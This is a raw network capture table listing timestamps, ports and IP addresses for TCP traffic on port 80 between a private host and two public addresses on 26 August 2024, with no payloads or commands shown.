Aug 26, 2024 23:29:20.324948072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.324951887 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.324990034 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325012922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325025082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325035095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325047016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325066090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325083971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325087070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325098038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325114965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325130939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325139999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325145006 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325154066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325162888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325165033 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325189114 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325191021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325201988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325215101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325222969 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325252056 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.325262070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325273037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.325304985 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326030016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326040983 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326054096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326083899 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326097012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326102018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326112032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326122999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326133966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326144934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326155901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326185942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326237917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326267004 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326278925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326284885 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326318026 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326345921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326356888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326368093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326379061 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.326396942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326407909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.326442003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.356758118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356779099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356789112 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356820107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356832981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356838942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.356848955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356885910 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.356930971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.356952906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356965065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.356976986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357002020 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357019901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357053041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357065916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357075930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357088089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357100010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357106924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357111931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357136011 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357142925 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357158899 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357189894 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357255936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357266903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357276917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357287884 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357299089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357306957 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357311964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357321978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357336044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357357979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357475042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357486963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357496977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357527018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357548952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357861996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357873917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357883930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357897043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357908010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357917070 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357917070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357928038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357944012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357953072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357955933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357964993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357965946 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357978106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.357984066 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.357995033 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358007908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358016968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358021975 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358028889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358040094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358051062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358052015 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358072042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358074903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358081102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358086109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358092070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358098030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358102083 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358102083 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358166933 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358191013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358201981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358212948 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358225107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358238935 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358258963 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358261108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358273029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358294964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358304024 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358304977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358316898 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358330011 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358334064 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358340979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358354092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358364105 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358366013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358376980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358388901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358409882 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358433008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358448029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358493090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358602047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358613014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358623028 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358633041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358645916 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358650923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358663082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358674049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358680964 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358684063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358695030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358700037 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358725071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358731031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358741045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358743906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358757019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358773947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358794928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358829975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358841896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358854055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358866930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358877897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358881950 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358896971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358906984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358918905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358932018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358959913 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.358972073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358983994 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.358994961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.359018087 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.359057903 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.398123026 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.399867058 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:20.424444914 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:20.424515963 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:20.426080942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426106930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426120043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426151037 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426160097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426172972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426179886 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426184893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426197052 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426214933 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426244974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426244974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426296949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426310062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426320076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426338911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426351070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426358938 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426362038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426373005 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426374912 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426386118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426398039 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426398993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426431894 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426431894 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426569939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426582098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426597118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426609993 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426620007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426630974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426634073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426645994 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426656961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426657915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426670074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426677942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426677942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426682949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426703930 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426734924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426734924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426764011 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426775932 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426786900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426827908 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426829100 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.426904917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426918030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.426989079 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.427021027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.427033901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.427042007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.427088976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.427088976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.429280043 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429440975 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429451942 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429460049 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429518938 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429528952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.429537058 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:20.447671890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447731018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447742939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447755098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447768927 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447897911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.447906971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447925091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447941065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447959900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447972059 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447983027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.447993040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.447993040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.447993994 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448012114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448019981 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448023081 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448035002 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448046923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448050022 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448056936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448064089 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448067904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448080063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448091984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448096991 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448110104 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448122025 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448138952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448138952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448162079 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448165894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448177099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448189020 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448216915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448273897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448280096 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448292017 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448304892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448317051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448332071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448343039 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448350906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448357105 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448363066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448375940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448389053 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448391914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448391914 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448426008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448426008 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448430061 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448442936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448455095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448465109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448486090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448498964 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448596954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448609114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448620081 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448659897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448668003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448668003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448672056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448683977 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448700905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448707104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448714972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448726892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448746920 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448746920 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448780060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448807001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448820114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448832035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448859930 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448868036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448880911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448890924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:20.448957920 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448970079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448982000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:20.448990107 CEST	49734	80	192.168.2.7	185.215.113.16
